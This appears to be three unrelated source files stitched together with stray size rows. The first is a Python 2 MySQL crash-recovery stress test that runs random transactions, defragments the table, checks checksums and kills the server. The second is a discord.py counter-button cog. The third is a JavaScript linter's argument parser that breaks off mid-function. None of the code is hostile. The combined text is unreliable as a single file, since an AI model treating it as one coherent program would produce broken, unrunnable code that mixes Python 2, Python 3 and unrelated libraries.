import cStringIO
import hashlib
import MySQLdb
import os
import random
import signal
import sys
import threading
import time
import string
import traceback
# Alphanumeric alphabet used for generated payloads.
# NOTE: string.letters is Python 2 only (and locale-dependent); this whole
# script is Python 2 (print statements, xrange, MySQLdb).
CHARS = string.letters + string.digits
def sha1(x):
    """Return the hex SHA-1 digest of str(x).

    Encodes the string as UTF-8 before hashing so the helper also works on
    Python 3, where hashlib requires bytes. All messages produced by
    get_msg() are ASCII-only, so the resulting digest is identical to the
    original str()-based Python 2 behaviour.
    """
    return hashlib.sha1(str(x).encode('utf-8')).hexdigest()
# Should be deterministic given an idx
def get_msg(do_blob, idx):
    # Reproducible payload generator: seeding the module-level RNG with idx
    # means the exact same string can be regenerated later for validation.
    # Do not reorder the random.* calls below — determinism depends on the
    # exact call sequence after the seed.
    random.seed(idx);
    if do_blob:
        # Large payloads exercise blob/off-page storage.
        blob_length = random.randint(1, 24000)
    else:
        blob_length = random.randint(1, 255)
    if random.randint(1, 2) == 1:
        # blob that cannot be compressed (well, compresses to 85% of original size)
        return ''.join([random.choice(CHARS) for x in xrange(blob_length)])
    else:
        # blob that can be compressed
        return random.choice(CHARS) * blob_length
class ValidateError(Exception):
    """Raised when validate_msg finds a row whose prefix, length or
    checksum disagrees with its stored message."""
class ChecksumError(Exception):
    """Raised when the ChecksumWorker's computed table checksum does not
    match the expected value it was given."""
# Base class for worker threads
class WorkerThread(threading.Thread):
    # Template-method base: subclasses implement runme() (the workload) and
    # finish() (cleanup). run() captures any exception as a formatted
    # traceback in self.exception so the main thread can report failures
    # after join() instead of the thread dying silently.
    global LG_TMP_DIR

    def __init__(self, base_log_name):
        threading.Thread.__init__(self)
        # Each worker appends to its own log file under LG_TMP_DIR.
        self.log = open('/%s/%s.log' % (LG_TMP_DIR, base_log_name), 'a')
        self.exception = None

    def run(self):
        try:
            self.runme()
            print >> self.log, "ok"
        except Exception, e:
            # Store the traceback for the joining thread; also log it.
            self.exception = traceback.format_exc()
            print >> self.log, "\n%s\n" % self.exception
        finally:
            # finish() always runs, success or failure (closes log/connection).
            self.finish()
class PopulateWorker(WorkerThread):
    # Inserts rows with ids in [start_id, end_id) on its own connection,
    # committing every 100 rows to bound transaction size.

    def __init__(self, con, start_id, end_id, i, document_table):
        WorkerThread.__init__(self, 'populate-%d' % i)
        self.con = con
        con.autocommit(False)
        self.num = i
        self.start_id = start_id
        self.end_id = end_id
        self.document_table = document_table
        self.start_time = time.time()
        # The thread starts running immediately on construction.
        self.start()

    def finish(self):
        print >> self.log, "total time: %.2f s" % (time.time() - self.start_time)
        self.log.close()
        # Commit any rows inserted since the last periodic commit.
        self.con.commit()
        self.con.close()

    def runme(self):
        print >> self.log, "populate thread-%d started" % self.num
        cur = self.con.cursor()
        stmt = None
        for i in xrange(self.start_id, self.end_id):
            # NOTE: do_blob here is the script-level global set in __main__.
            msg = get_msg(do_blob, i)
            # Table ids are 1-based, hence i+1.
            stmt = get_insert(msg, i+1, self.document_table)
            cur.execute(stmt)
            if i % 100 == 0:
                self.con.commit()
def populate_table(con, num_records_before, do_blob, log, document_table):
    """Seed table t1 with num_records_before rows using 10 parallel workers.

    Each PopulateWorker inserts a contiguous id range over its own
    connection; the remainder (num_records_before not divisible by 10) is
    inserted inline on the caller's connection. Returns True on success,
    False if any worker raised.
    """
    con.autocommit(False)
    cur = con.cursor()
    stmt = None
    workers = []
    # Python 2 integer division: each worker gets N consecutive ids.
    N = num_records_before / 10
    start_id = 0
    for i in xrange(10):
        w = PopulateWorker(MySQLdb.connect(user=user, host=host, port=port, db=db),
                           start_id, start_id + N, i, document_table)
        start_id += N
        workers.append(w)
    # Insert the remainder rows (ids start_id..num_records_before-1) inline.
    for i in xrange(start_id, num_records_before):
        msg = get_msg(do_blob, i)
        # print >> log, "length is %d, complen is %d" % (len(msg), len(zlib.compress(msg, 6)))
        stmt = get_insert(msg, i+1, document_table)
        cur.execute(stmt)
    con.commit()
    for w in workers:
        w.join()
        if w.exception:
            print >>log, "populater thead %d threw an exception" % w.num
            return False
    return True
def get_update(msg, idx, document_table):
    """Build an UPDATE statement rewriting row `idx` with `msg` and its
    derived prefix/length/checksum columns (or JSON doc fields)."""
    prefix = msg[0:255]
    length = len(msg)
    checksum = sha1(msg)
    if document_table:
        return """
UPDATE t1 SET doc = '{"msg_prefix" : "%s", "msg" : "%s", "msg_length" : %d,
"msg_checksum" : "%s"}' WHERE id=%d""" % (prefix, msg, length, checksum, idx)
    return """
UPDATE t1 SET msg_prefix='%s',msg='%s',msg_length=%d,
msg_checksum='%s' WHERE id=%d """ % (prefix, msg, length, checksum, idx)
def get_insert_on_dup(msg, idx, document_table):
    """Build an upsert (INSERT ... ON DUPLICATE KEY UPDATE) for row `idx`."""
    prefix = msg[0:255]
    length = len(msg)
    checksum = sha1(msg)
    if document_table:
        return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
ON DUPLICATE KEY UPDATE
id=VALUES(id),
doc=VALUES(doc)
""" % (idx, prefix, msg, length, checksum)
    return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id)
VALUES ('%s','%s',%d,'%s',%d)
ON DUPLICATE KEY UPDATE
msg_prefix=VALUES(msg_prefix),
msg=VALUES(msg),
msg_length=VALUES(msg_length),
msg_checksum=VALUES(msg_checksum),
id=VALUES(id)""" % (prefix, msg, length, checksum, idx)
def get_insert(msg, idx, document_table):
    """Build a plain INSERT for row `idx` carrying `msg` plus its derived
    prefix/length/checksum columns (or JSON doc fields)."""
    prefix = msg[0:255]
    length = len(msg)
    checksum = sha1(msg)
    if document_table:
        return """
INSERT INTO t1 (id, doc) VALUES
(%d, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (idx, prefix, msg, length, checksum)
    return """
INSERT INTO t1(id,msg_prefix,msg,msg_length,msg_checksum)
VALUES (%d,'%s','%s',%d,'%s')
""" % (idx, prefix, msg, length, checksum)
def get_insert_null(msg, document_table):
    """Build an INSERT with a NULL id so the server assigns one
    (auto-increment); payload columns are derived from `msg`."""
    prefix = msg[0:255]
    length = len(msg)
    checksum = sha1(msg)
    if document_table:
        return """
INSERT INTO t1 (id, doc) VALUES
(NULL, '{"msg_prefix" : "%s", "msg": "%s", "msg_length" : %d,
"msg_checksum" : "%s"}')
""" % (prefix, msg, length, checksum)
    return """
INSERT INTO t1 (msg_prefix,msg,msg_length,msg_checksum,id) VALUES
('%s','%s',%d,'%s',NULL)
""" % (prefix, msg, length, checksum)
class ChecksumWorker(WorkerThread):
    # Recomputes CHECKSUM TABLE t1 and compares it to the expected value
    # supplied by the caller; raises ChecksumError on mismatch.

    def __init__(self, con, checksum):
        WorkerThread.__init__(self, 'worker-checksum')
        self.con = con
        con.autocommit(False)
        # Expected checksum, provided on the command line by the harness.
        self.checksum = checksum
        print >> self.log, "given checksum=%d" % checksum
        self.start()

    def finish(self):
        print >> self.log, "total time: %.2f s" % (time.time() - self.start_time)
        self.log.close()
        self.con.close()

    def runme(self):
        print >> self.log, "checksum thread started"
        # NOTE: start_time is set here (not in __init__); finish() relies on
        # runme() having run first.
        self.start_time = time.time()
        cur = self.con.cursor()
        # Larger linear read-ahead for the full-table scan below.
        cur.execute("SET SESSION innodb_lra_size=16")
        cur.execute("CHECKSUM TABLE t1")
        # Result row is (table_name, checksum).
        checksum = cur.fetchone()[1]
        self.con.commit()
        if checksum != self.checksum:
            errmsg = ("checksums do not match. given checksum=%d, "
                      "calculated checksum=%d" % (self.checksum, checksum))
            print >> self.log, errmsg
            raise ChecksumError(errmsg)
        else:
            print >> self.log, "checksums match! (both are %d)" % checksum
class Worker(WorkerThread):
    # Random read/write workload thread. Each iteration picks a random id,
    # reads it back via the primary or secondary (msg_prefix) index,
    # validates the row contents, then either upserts or deletes the row.
    # Transactions are deliberately left open most of the time (30% commit,
    # 10% rollback per iteration) to stress crash recovery.

    def __init__(self, num_xactions, xid, con, server_pid, do_blob, max_id,
                 fake_changes, secondary_checks, document_table):
        WorkerThread.__init__(self, 'worker%02d' % xid)
        self.do_blob = do_blob
        self.xid = xid
        con.autocommit(False)
        self.con = con
        self.num_xactions = num_xactions
        cur = self.con.cursor()
        # Per-thread RNG seeded from xid and the server pid so threads
        # differ from each other and runs differ across server restarts.
        self.rand = random.Random()
        self.rand.seed(xid * server_pid)
        self.loop_num = 0
        self.max_id = max_id
        # Operation counters reported by finish().
        self.num_primary_select = 0
        self.num_secondary_select = 0
        self.num_secondary_only_select = 0
        self.num_inserts = 0
        self.num_deletes = 0
        self.num_updates = 0
        self.time_spent = 0
        if fake_changes:
            cur.execute("SET innodb_fake_changes=1")
        self.secondary_checks = secondary_checks
        self.document_table = document_table
        self.start()

    def finish(self):
        print >> self.log, "loop_num:%d, total time: %.2f s" % (
            self.loop_num, time.time() - self.start_time + self.time_spent)
        print >> self.log, "num_primary_select=%d,num_secondary_select=%d,num_secondary_only_select=%d" %\
            (self.num_primary_select, self.num_secondary_select, self.num_secondary_only_select)
        print >> self.log, "num_inserts=%d,num_updates=%d,num_deletes=%d,time_spent=%d" %\
            (self.num_inserts, self.num_updates, self.num_deletes, self.time_spent)
        self.log.close()

    def validate_msg(self, msg_prefix, msg, msg_length, msg_checksum, idx):
        # Verify a row read back is internally consistent: the stored
        # prefix, length and checksum must all be derivable from msg.
        # Raises ValidateError on any mismatch.
        prefix_match = msg_prefix == msg[0:255]
        checksum = sha1(msg)
        checksum_match = checksum == msg_checksum
        len_match = len(msg) == msg_length
        if not prefix_match or not checksum_match or not len_match:
            errmsg = "id(%d), length(%s,%d,%d), checksum(%s,%s,%s) prefix(%s,%s,%s)" % (
                idx,
                len_match, len(msg), msg_length,
                checksum_match, checksum, msg_checksum,
                prefix_match, msg_prefix, msg[0:255])
            print >> self.log, errmsg
            raise ValidateError(errmsg)
        else:
            print >> self.log, "Validated for length(%d) and id(%d)" % (msg_length, idx)

    # Check to see if the idx is in the first column of res_array
    def check_exists(self, res_array, idx):
        for res in res_array:
            if res[0] == idx:
                return True
        return False

    def runme(self):
        self.start_time = time.time()
        cur = self.con.cursor()
        print >> self.log, "thread %d started, run from %d to %d" % (
            self.xid, self.loop_num, self.num_xactions)
        while self.loop_num < self.num_xactions:
            idx = self.rand.randint(0, self.max_id)
            # 75% of iterations write (insert/update), 25% delete.
            insert_or_update = self.rand.randint(0, 3)
            self.loop_num += 1
            try:
                stmt = None
                # Randomly toggle innodb_prefix_index_cluster_optimization 5%
                # of the time
                if self.rand.randint(0, 20) == 0:
                    cur.execute("SET GLOBAL innodb_prefix_index_cluster_optimization="
                                "1-@@innodb_prefix_index_cluster_optimization")
                # Randomly change the value of innodb_zlib_wrap 2.77% of the time
                if self.rand.randint(0, 36) == 0:
                    cur.execute("SET GLOBAL innodb_zlib_wrap=1-@@innodb_zlib_wrap");
                # Deterministic payload for idx — the same msg the row holds
                # if it was written by any worker with this idx.
                msg = get_msg(self.do_blob, idx)
                # Query primary key 70%, secondary key lookup 20%, secondary key only 10%
                r = self.rand.randint(1, 10)
                if r <= 7:
                    if self.document_table:
                        cur.execute("SELECT doc.msg_prefix,doc.msg,doc.msg_length, "
                                    "doc.msg_checksum FROM t1 WHERE id=%d" % idx)
                    else:
                        cur.execute("SELECT msg_prefix,msg,msg_length,msg_checksum FROM t1 WHERE id=%d" % idx)
                    res = cur.fetchone()
                    self.num_primary_select += 1
                elif r <= 9:
                    if self.document_table:
                        cur.execute("SELECT doc.msg_prefix,doc.msg,doc.msg_length, "
                                    "doc.msg_checksum FROM t1 use document keys WHERE doc.msg_prefix='%s'"
                                    % msg[0:255])
                    else:
                        cur.execute("SELECT msg_prefix,msg,msg_length,msg_checksum FROM t1 WHERE msg_prefix='%s'" % msg[0:255])
                    res = cur.fetchone()
                    self.num_secondary_select += 1
                # Query only the secondary index
                else:
                    if self.document_table:
                        cur.execute("SELECT id, doc.msg_prefix FROM t1 use document keys "
                                    "WHERE doc.msg_prefix='%s'" % msg[0:255])
                    else:
                        cur.execute("SELECT id, msg_prefix FROM t1 WHERE "
                                    "msg_prefix='%s'" % msg[0:255])
                    res = cur.fetchall()
                    self.num_secondary_only_select += 1
                # Don't validate if r > 9 because we don't have sufficient columns.
                if r <= 9 and res:
                    self.validate_msg(res[0], res[1], int(res[2]), res[3], idx)
                insert_with_index = False
                if insert_or_update:
                    if res:
                        # Row exists: update it, half the time via an upsert.
                        if self.rand.randint(0, 1):
                            stmt = get_update(msg, idx, self.document_table)
                        else:
                            stmt = get_insert_on_dup(msg, idx, self.document_table)
                            insert_with_index = True
                        self.num_updates += 1
                    else:
                        # Row missing: insert by id, upsert, or NULL-id insert.
                        r = self.rand.randint(0, 2)
                        if r == 0:
                            stmt = get_insert(msg, idx, self.document_table)
                            insert_with_index = True
                        elif r == 1:
                            stmt = get_insert_on_dup(msg, idx, self.document_table)
                            insert_with_index = True
                        else:
                            stmt = get_insert_null(msg, self.document_table)
                        self.num_inserts += 1
                else:
                    stmt = "DELETE FROM t1 WHERE id=%d" % idx
                    self.num_deletes += 1
                query_result = cur.execute(stmt)
                # 10% probability of checking to see the key exists in secondary index
                if self.secondary_checks and self.rand.randint(1, 10) == 1:
                    if self.document_table:
                        cur.execute("SELECT id, doc.msg_prefix FROM t1 use document keys WHERE "
                                    "doc.msg_prefix='%s'" % msg[0:255])
                    else:
                        cur.execute("SELECT id, msg_prefix FROM t1 WHERE msg_prefix='%s'" % msg[0:255])
                    res_array = cur.fetchall()
                    if insert_or_update:
                        if insert_with_index:
                            if not self.check_exists(res_array, idx):
                                print >> self.log, "Error: Inserted row doesn't exist in secondary index"
                                raise Exception("Error: Inserted row doesn't exist in secondary index")
                    else:
                        if self.check_exists(res_array, idx):
                            print >> self.log, "Error: Deleted row still exists in secondary index"
                            raise Exception("Error: Deleted row still exists in secondary index")
                if (self.loop_num % 100) == 0:
                    print >> self.log, "Thread %d loop_num %d: result %d: %s" % (self.xid,
                                                                                 self.loop_num, query_result,
                                                                                 stmt)
                # 30% commit, 10% rollback, 60% don't end the trx
                r = self.rand.randint(1,10)
                if r < 4:
                    self.con.commit()
                elif r == 4:
                    self.con.rollback()
            except MySQLdb.Error, e:
                # 2006/2013 = server gone away / lost connection: expected
                # when the harness kills mysqld mid-run, so exit quietly.
                if e.args[0] == 2006 or e.args[0] == 2013:
                    print >> self.log, "mysqld down, transaction %d" % self.xid
                    return
                else:
                    print >> self.log, "mysql error for stmt(%s) %s" % (stmt, e)
        try:
            self.con.commit()
        except Exception, e:
            print >> self.log, "commit error %s" % e
class DefragmentWorker(WorkerThread):
    # Repeatedly runs ALTER TABLE t1 DEFRAGMENT in the background until
    # stop() is called; a daemon thread so it never blocks process exit.

    def __init__(self, con):
        WorkerThread.__init__(self, 'worker-defragment')
        self.num_defragment = 0
        self.con = con
        self.con.autocommit(True)
        self.start_time = time.time()
        self.daemon = True
        # Cooperative stop flag, polled by runme().
        self.stopped = False
        self.start()

    def stop(self):
        self.stopped = True

    def finish(self):
        print >> self.log, "defragment ran %d times" % self.num_defragment
        print >> self.log, "total time: %.2f s" % (time.time() - self.start_time)
        self.log.close()
        self.con.close()

    def runme(self):
        print >> self.log, "defragmentation thread started"
        cur = self.con.cursor()
        while not self.stopped:
            try:
                print >> self.log, "Starting defrag."
                cur.execute("ALTER TABLE t1 DEFRAGMENT")
                print >> self.log, "Defrag completed successfully."
                self.num_defragment += 1
                # Random pause between passes to vary interleaving.
                time.sleep(random.randint(0, 10))
            except MySQLdb.Error, e:
                # Handle crash tests that kill the server while defragment runs.
                if e.args[0] == 2006 or e.args[0] == 2013:
                    print >> self.log, "Server crashed while defrag was running."
                else:
                    raise e
if __name__ == '__main__':
    # NOTE: `global` at module level is a no-op; kept for clarity that
    # LG_TMP_DIR is read by WorkerThread.
    global LG_TMP_DIR
    # Positional arguments supplied by the test harness, in order:
    pid_file = sys.argv[1]                    # file holding mysqld's pid
    kill_db_after = int(sys.argv[2])          # seconds before SIGKILLing mysqld (0 = never)
    num_records_before = int(sys.argv[3])     # rows to preload into t1
    num_workers = int(sys.argv[4])            # number of read/write Worker threads
    num_xactions_per_worker = int(sys.argv[5])
    user = sys.argv[6]
    host = sys.argv[7]
    port = int(sys.argv[8])
    db = sys.argv[9]
    do_blob = int(sys.argv[10])               # 1 = large blob payloads
    max_id = int(sys.argv[11])                # id range workers operate over
    LG_TMP_DIR = sys.argv[12]                 # directory for per-thread logs
    fake_changes = int(sys.argv[13])
    checksum = int(sys.argv[14])              # expected CHECKSUM TABLE value (0 = skip)
    secondary_checks = int(sys.argv[15])
    no_defrag = int(sys.argv[16])
    document_table = int(sys.argv[17])        # 1 = JSON document-style table
    checksum_worker = None
    defrag_worker = None
    workers = []
    server_pid = int(open(pid_file).read())
    log = open('/%s/main.log' % LG_TMP_DIR, 'a')
    # print "kill_db_after = ",kill_db_after," num_records_before = ", \
    #num_records_before, " num_workers= ",num_workers, "num_xactions_per_worker =",\
    #num_xactions_per_worker, "user = ",user, "host =", host,"port = ",port,\
    #" db = ", db, " server_pid = ", server_pid

    # Phase 1: optionally preload the table.
    if num_records_before:
        print >> log, "populate table do_blob is %d" % do_blob
        con = None
        retry = 3
        while not con and retry > 0:
            con = MySQLdb.connect(user=user, host=host, port=port, db=db)
            retry = retry - 1
        if not con:
            print >> log, "Cannot connect to MySQL after 3 attempts."
            sys.exit(1)
        if not populate_table(con, num_records_before, do_blob, log,
                              document_table):
            sys.exit(1)
        con.close()

    # Phase 2: optional checksum verification thread.
    if checksum:
        print >> log, "start the checksum thread"
        con = MySQLdb.connect(user=user, host=host, port=port, db=db)
        if not con:
            print >> log, "Cannot connect to MySQL server"
            sys.exit(1)
        checksum_worker = ChecksumWorker(con, checksum)
        workers.append(checksum_worker)

    # Phase 3: launch the read/write workload threads (each with its own
    # connection) and, unless disabled, a background defragment thread.
    print >> log, "start %d threads" % num_workers
    for i in xrange(num_workers):
        worker = Worker(num_xactions_per_worker, i,
                        MySQLdb.connect(user=user, host=host, port=port, db=db),
                        server_pid, do_blob, max_id, fake_changes, secondary_checks,
                        document_table)
        workers.append(worker)
    if no_defrag == 0:
        defrag_worker = DefragmentWorker(MySQLdb.connect(user=user, host=host,
                                                         port=port, db=db))

    # Phase 4 (crash testing): kill mysqld while the workload is running.
    if kill_db_after:
        print >> log, "kill mysqld"
        time.sleep(kill_db_after)
        os.kill(server_pid, signal.SIGKILL)

    # Phase 5: join everything and propagate any captured exceptions.
    worker_failed = False
    print >> log, "wait for threads"
    for w in workers:
        w.join()
        if w.exception:
            print "Worker hit an exception:\n%s\n" % w.exception
            worker_failed = True
    if defrag_worker:
        defrag_worker.stop()
        defrag_worker.join()
        if defrag_worker.exception:
            print ("Defrag worker hit an exception:\n%s\n." %
                   defrag_worker.exception)
            worker_failed = True
    if checksum_worker:
        checksum_worker.join()
        if checksum_worker.exception:
            print ("Checksum worker hit an exception:\n%s\n." %
                   checksum_worker.exception)
            worker_failed = True
    if worker_failed:
        sys.exit(1)
    print >> log, "all threads done"
| 18,260 | 6,325 |
from configparser import ConfigParser
from glob import glob
from discord import Embed
from discord.ext.commands import Cog, command, group, is_owner
import asyncio
import datetime
import sys
import discord
from discord.ext.commands.context import Context
#from tinker.ext.apps import *
class Counter(discord.ui.View):
    """A view with a single button that counts presses up to five.

    Each press increments the number shown on the button. When the count
    reaches 5 the button turns green and is disabled.
    """

    # Define the actual button.
    # note: The name of the function does not matter to the library
    @discord.ui.button(label='0', style=discord.ButtonStyle.red)
    async def count(self, button: discord.ui.Button, interaction: discord.Interaction):
        number = int(button.label) if button.label else 0
        number += 1
        # Bug fix: the label must be updated on every press; previously the
        # condition `number + 1 <= 5` greened/disabled the button on the
        # FIRST press, so the counter never actually counted to five.
        button.label = str(number)
        if number >= 5:
            button.style = discord.ButtonStyle.green
            button.disabled = True
        # Make sure to update the message with our updated selves
        await interaction.response.edit_message(view=self)
# Define a View that will give us our own personal counter button
class admin_slash(Cog):
    """Cog exposing the button/counter demo command."""

    def __init__(self, client):
        # The bot/client instance this cog is attached to.
        self.client = client

    # Define a simple View that gives us a counter button
    class EphemeralCounter(discord.ui.View):
        # When this button is pressed, it will respond with a Counter view that will
        # give the button presser their own personal button they can press 5 times.
        @discord.ui.button(label='Click', style=discord.ButtonStyle.blurple)
        async def receive(self, button: discord.ui.Button, interaction: discord.Interaction):
            # ephemeral=True makes the message hidden from everyone except the button presser
            await interaction.response.send_message('Enjoy!', view=Counter(), ephemeral=True)

    @command()
    async def counter(self, ctx: Context):
        """Starts a counter for pressing."""
        await ctx.send('Press!', view=self.EphemeralCounter())
| 2,037 | 557 |
#!/usr/bin/env python
# Copyright 2018 The JsCodeStyle Authors.
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Checks JavaScript files for common style guide violations.
gjslint.py is designed to be used as a PRESUBMIT script to check for javascript
style guide violations. As of now, it checks for the following violations:
* Missing and extra spaces
* Lines longer than 80 characters
* Missing newline at end of file
* Missing semicolon after function declaration
* Valid JsDoc including parameter matching
Someday it will validate to the best of its ability against the entirety of the
JavaScript style guide.
This file is a front end that parses arguments and flags. The core of the code
is in tokenizer.py and checker.py.
"""
from __future__ import print_function
import argparse
import sys
import time
import os
import glob
import re
import multiprocessing
import errno
from itertools import tee
from functools import partial
from jscodestyle.errorrecord import check_path, fix_path
from jscodestyle.error_check import STRICT_DOC, JSLINT_ERROR_DOC
from jscodestyle.error_fixer import ErrorFixer
# Flags understood only by the gjslint entry point; check() strips them from
# sys.argv when printing the suggested "fixjsstyle" command line.
GJSLINT_ONLY_FLAGS = ['--unix_mode', '--beep', '--nobeep', '--time',
                      '--check_html', '--summary', '--quiet']
# Comment - Below are all the arguments from gjslint. There are way
# too many, we should think what is really useful and cull some.
# Perhaps we should rely more on a config file for advance setups
class JsCodeStyle(object):
    """This class is a front end that parses arguments and flags."""

    def __init__(self):
        """Parse command-line flags and collect the set of files to process."""
        parser = argparse.ArgumentParser()
        parser.add_argument(
            'paths',
            help='the files to check',
            type=str,
            nargs='*',
            default=sys.stdin)
        parser.add_argument(
            '-u', '--unix_mode',
            help='emit warnings in standard unix format e.g. for Emacs',
            action='store_true')
        parser.add_argument(
            '-b', '--beep',
            help='do not beep when errors are found',
            action='store_false')
        parser.add_argument(
            '-t', '--time',
            help='emit timing statistics',
            action='store_true')
        parser.add_argument(
            '-c', '--check_html',
            help='check javascript in html files',
            action='store_true')
        parser.add_argument(
            '-s', '--summary',
            help='show an error count summary',
            action='store_true')
        parser.add_argument(
            '-q', '--quiet',
            help=('minimize logged messages. '
                  'Most useful for per-file linting, such as that '
                  'performed by the presubmit linter service.'),
            action='store_true')
        parser.add_argument(
            '-p', '--singleprocess',
            help=('disable parallelised linting using the '
                  'multiprocessing module; this may make debugging easier.'),
            action='store_true')
        parser.add_argument(
            '-a', '--additional_extensions',
            help=('Additional file extensions (not js) that should '
                  'be treated as JavaScript files e.g. es, es6 or ts.'),
            metavar='ext',
            nargs='+')
        parser.add_argument(
            '-r', '--recurse',
            help=('recurse in to the subdirectories of the given path'),
            action='append',
            nargs='+',
            metavar='dir')
        parser.add_argument(
            '-e', '--exclude_directories',
            help=('exclude the specified directories '
                  '(only applicable along with -r'),
            type=str,
            action='append',
            nargs='+',
            metavar='dir')
        parser.add_argument(
            '-x', '--exclude_files',
            type=str,
            nargs='*',
            help='exclude the specified files',
            action='append',
            metavar='file')
        parser.add_argument(
            '--limited_doc_files',
            help=('List of files with relaxed documentation checks. Will not '
                  'report errors for missing documentation, some missing '
                  'descriptions, or methods whose @return tags don\'t have a '
                  'matching return statement.'),
            action='append',
            nargs='*',
            metavar="filename")
        parser.add_argument(
            '--error_trace',
            help='show error exceptions.',
            action='store_true')
        parser.add_argument(
            '--closurized_namespaces',
            help=('namespace prefixes, used for testing of'
                  'goog.provide/require'),
            action='append',
            nargs='*',
            metavar="prefix")
        parser.add_argument(
            '--ignored_extra_namespaces',
            help=('Fully qualified namespaces that should be not be reported '
                  'as extra by the linter.'),
            action='append',
            nargs='*',
            metavar="namespace")
        parser.add_argument(
            '--custom_jsdoc_tags',
            help=('extra jsdoc tags to allow'),
            action='append',
            nargs='*',
            metavar="tagname")
        parser.add_argument(
            '--dot_on_next_line',
            help=('Require dots to be'
                  'placed on the next line for wrapped expressions'),
            action='store_true')
        parser.add_argument(
            '--check_trailing_comma',
            help=('check trailing commas '
                  '(ES3, not needed from ES5 onwards)'),
            action='store_true')
        parser.add_argument(
            '--debug_indentation',
            help='print debugging information for indentation',
            action='store_true')
        # Comment - watch this one, backwards internally than before
        parser.add_argument(
            '--jsdoc',
            help='disable reporting errors for missing JsDoc.',
            action='store_true')
        # Comment - this should change to named errors
        parser.add_argument(
            '--disable',
            help=('Disable specific error. Usage Ex.: gjslint --disable 1 '
                  '0011 foo.js.'),
            action='append',
            nargs='*',
            metavar='error_num')
        # Comment - old version checked for minimum of N=1,
        # so maybe check for negative later
        parser.add_argument(
            '--max_line_length',
            type=int,
            help=('Maximum line length allowed '
                  'without warning (default 80).'),
            metavar='N',
            default=80)
        parser.add_argument(
            '--strict',
            help=STRICT_DOC,
            action='store_true')
        parser.add_argument(
            '--jslint_error',
            help=JSLINT_ERROR_DOC,
            action='append',
            nargs='+')
        parser.add_argument(
            '--dry_run',
            help='(fixjscodestyle) do not modify the file, only print it.',
            action='store_true')
        parser.add_argument(
            '--disable_indentation_fixing',
            help='(fixjscodestyle) disable automatic fixing of indentation.',
            action='store_true')
        parser.add_argument(
            '--fix_error_codes',
            help=('(fixjscodestyle) list of specific error codes to '
                  'fix. Defaults to all supported error codes when empty. '
                  'See errors.py for a list of error codes.'),
            action='append',
            nargs='+',
            metavar='error_num')
        self.args = parser.parse_args()
        # Emacs sets the environment variable INSIDE_EMACS in the subshell.
        # Request Unix mode as emacs will expect output to be in Unix format
        # for integration.
        # See https://www.gnu.org/software/emacs/manual/html_node/emacs/
        # Interactive-Shell.html
        if 'INSIDE_EMACS' in os.environ:
            self.args.unix_mode = True
        self.suffixes = ['.js']
        if self.args.additional_extensions:
            self.suffixes += ['.%s' % ext for ext in self.args.additional_extensions]
        if self.args.check_html:
            self.suffixes += ['.html', '.htm']
        self.paths = None
        self._get_paths()
        self.start_time = time.time()

    @staticmethod
    def _flatten(groups):
        """Flatten the list-of-lists built by argparse action='append' + nargs.

        Flags declared with both action='append' and nargs collect one list
        per flag occurrence, so e.g. --recurse a b --recurse c yields
        [['a', 'b'], ['c']].  Callers here want a single flat list.

        Args:
            groups: The argparse value (a list of lists), or None if the
                flag was never given.

        Returns:
            A flat list of the values, or [] when groups is falsy.
        """
        if not groups:
            return []
        return [item for group in groups for item in group]

    def matches_suffixes(self, filename):
        """Returns whether the given filename matches one of the given suffixes.

        Args:
          filename: Filename to check.

        Returns:
          Whether the given filename matches one of the given suffixes.
        """
        suffix = filename[filename.rfind('.'):]
        return suffix in self.suffixes

    def get_user_specified_files(self):
        """Returns files to be linted, specified directly on the command line.

        Can handle the '*' wildcard in filenames, but no other wildcards.

        Returns:
          A sequence of files to be linted.
        """
        all_files = []
        lint_files = []
        # NOTE(review): self.args.paths defaults to sys.stdin; iterating it
        # yields newline-terminated lines — presumably callers strip them
        # upstream or always pass paths explicitly. Confirm before relying
        # on the stdin path.
        # Perform any necessary globs.
        for filename in self.args.paths:
            if filename.find('*') != -1:
                for result in glob.glob(filename):
                    all_files.append(result)
            else:
                all_files.append(filename)
        for filename in all_files:
            if self.matches_suffixes(filename):
                lint_files.append(filename)
        return lint_files

    def get_recursive_files(self):
        """Returns files to be checked specified by the --recurse flag.

        Returns:
          A list of files to be checked.
        """
        lint_files = []
        # Bug fix: --recurse is action='append' with nargs='+', so the raw
        # value is a list of lists; os.walk() was previously handed a whole
        # list instead of a directory path. Flatten first.
        for start in self._flatten(self.args.recurse):
            for root, _, files in os.walk(start):
                for filename in files:
                    if self.matches_suffixes(filename):
                        lint_files.append(os.path.join(root, filename))
        return lint_files

    def filter_files(self, files):
        """Filters the list of files to be linted be removing any excluded files.

        Filters out files excluded using --exclude_files and
        --exclude_directories.

        Args:
          files: Sequence of files that needs filtering.

        Side effect:
          Sets self.paths to the filtered set of absolute paths.
        """
        num_files = len(files)
        ignore_dirs_regexs = []
        # Bug fix: both flags are action='append' + nargs, i.e. lists of
        # lists; the old code compiled a regex from a *list*, breaking the
        # directory exclusion entirely.
        excluded_dirs = self._flatten(self.args.exclude_directories)
        excluded_files = self._flatten(self.args.exclude_files)
        for ignore in excluded_dirs:
            ignore_dirs_regexs.append(re.compile(r'(^|[\\/])%s[\\/]' % ignore))
        result_files = []
        for filename in files:
            add_file = True
            for exclude in excluded_files:
                if filename.endswith('/' + exclude) or filename == exclude:
                    add_file = False
                    break
            for ignore in ignore_dirs_regexs:
                if ignore.search(filename):
                    # Bug fix: mark the file excluded before breaking out.
                    # Previously add_file stayed True here, so files under
                    # --exclude_directories were added anyway.
                    add_file = False
                    break
            if add_file:
                # Convert everything to absolute paths so we can easily remove
                # duplicates using a set.
                result_files.append(os.path.abspath(filename))
        skipped = num_files - len(result_files)
        if skipped:
            print('Skipping %d file(s).' % skipped)
        self.paths = set(result_files)

    def _get_paths(self):
        """Finds all files specified by the user on the commandline."""
        files = self.get_user_specified_files()
